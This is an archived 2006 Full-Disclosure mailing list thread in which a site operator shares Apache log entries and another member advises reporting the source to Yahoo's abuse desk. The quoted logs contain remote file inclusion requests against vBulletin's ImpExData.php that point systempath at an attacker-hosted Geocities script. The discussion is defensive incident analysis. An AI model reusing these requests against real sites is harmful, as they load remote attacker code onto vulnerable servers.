[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-disclosure] attempts from 82.165.30.80
- To: Konstantine <listclient@xxxxxxxxx>
- Subject: Re: [Full-disclosure] attempts from 82.165.30.80
- From: "ad@xxxxxxxxxxxxxxxx" <ad@xxxxxxxxxxxxxxxx>
- Date: Mon, 03 Apr 2006 21:09:41 +0200
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta content="text/html;charset=ISO-8859-1"
http-equiv="Content-Type">
<title></title>
</head>
<body bgcolor="#ffffff" text="#000000">
-----BEGIN PGP SIGNED MESSAGE----- <br>
Hash: SHA1 <br>
<br>
you should use this<br>
<br>
<a class="moz-txt-link-freetext"
href="http://help.yahoo.com/help/us/geo/abuse/abuse-04.html";>http://help.yahoo.com/help/us/geo/abuse/abuse-04.html</a><br>
<br>
or<br>
<br>
<a class="moz-txt-link-freetext"
href="http://add.yahoo.com/fast/help/abuse/cgi_abuse";>http://add.yahoo.com/fast/help/abuse/cgi_abuse</a><br>
<br>
explaining them the user "deverificat3" is using a geocities account<br>
to scan the recent vbulletin vulnerability [1]<br>
<br>
Konstantine wrote:<br>
<span style="white-space: pre;">> These started to show up on
Apache logs recently. Are these attempts<br>
> to exploit [1]? Does it worth contacting the owner of the
website at<br>
> this address?<br>
><br>
> 82.165.30.80 - - [02/Apr/2006:11:30:21 +0100] "GET<br>
>
/forum/impex/ImpExData.php?systempath=<a class="moz-txt-link-freetext"
href="http://geocities.com/deverificat3/t.txt?&";>http://geocities.com/deverificat3/t.txt?&</a><br>
> HTTP/1.1" 404 1054<br>
> 82.165.30.80 - - [02/Apr/2006:11:30:24 +0100] "GET<br>
>
/impex/ImpExData.php?systempath=<a class="moz-txt-link-freetext"
href="http://geocities.com/deverificat3/t.txt?&";>http://geocities.com/deverificat3/t.txt?&</a><br>
> HTTP/1.1" 404 1054<br>
> 82.165.30.80 - - [02/Apr/2006:11:30:25 +0100] "GET<br>
>
/forums/impex/ImpExData.php?systempath=<a class="moz-txt-link-freetext"
href="http://geocities.com/deverificat3/t.txt?&";>http://geocities.com/deverificat3/t.txt?&</a><br>
> HTTP/1.1" 404 1054<br>
><br>
><br>
> [1]
<a class="moz-txt-link-freetext"
href="http://lists.grok.org.uk/pipermail/full-disclosure/2006-March/044318.html";>http://lists.grok.org.uk/pipermail/full-disclosure/2006-March/044318.html</a><br>
><br>
>
----------------------------------------------------------------------<br>
><br>
> _______________________________________________<br>
> Full-Disclosure - We believe in it.<br>
> Charter: <a class="moz-txt-link-freetext"
href="http://lists.grok.org.uk/full-disclosure-charter.html";>http://lists.grok.org.uk/full-disclosure-charter.html</a><br>
> Hosted and sponsored by Secunia - <a class="moz-txt-link-freetext"
href="http://secunia.com/";>http://secunia.com/</a></span><br>
-----BEGIN PGP SIGNATURE-----
<br>
Version: GnuPG v1.4.2.1 (MingW32)
<br>
<br>
iD8DBQFEMXL1FJS99fNfR+YRAmktAJ90+JguXr+TsYZoaPrkAmyxPu/HkgCeKvje
<br>
8sjwiPS1Qb22XaY+hFay6ho=
<br>
=6l2d
<br>
-----END PGP SIGNATURE-----
<br>
<br>
</body>
</html>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/